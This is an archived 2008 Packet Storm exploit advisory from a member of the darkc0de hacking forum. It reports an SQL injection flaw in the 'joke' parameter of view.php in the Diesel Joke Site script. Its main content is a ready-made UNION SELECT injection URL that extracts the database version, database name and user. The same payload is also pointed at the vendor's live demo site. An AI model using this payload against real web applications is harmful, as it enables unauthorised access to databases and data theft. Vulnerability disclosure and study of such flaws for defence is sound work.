dieseljoke-sql.txt

2008-09-22T00:00:00
ID PACKETSTORM:70174
Type packetstorm
Reporter r45c4l
Modified 2008-09-22T00:00:00

Description

                                        
                                            `################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #   
#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz #  
# and all darkc0de members ---#   
################################################################   
#   
# Author: r45c4l   
#   
# Home : www.darkc0de.com   
#   
# Email : r45c4l@hotmail.com   
#   
# Share the c0de!   
#   
################################################################   
#   
# Title: Diesel Joke Site (view.php) SQL Injection Vulnerability  
#  
# VEndor: http://www.dieselscripts.com  
#   
#  
###########################################################  
#  
# d0rk: n/a  
#  
###########################################################  
  
POC :-   
  
http://www.site.com/joke/view.php?joke=-1+union+all+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13,14,15/*  
  
  
Live Demo:   
  
http://www.dieselscripts.com/demo/joke/view.php?joke=-1+union+all+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13,14,15/*  
  
  
  
###########################################################  
#  
# Bug discovered : 22 Sep.2008  
###########################################################  
`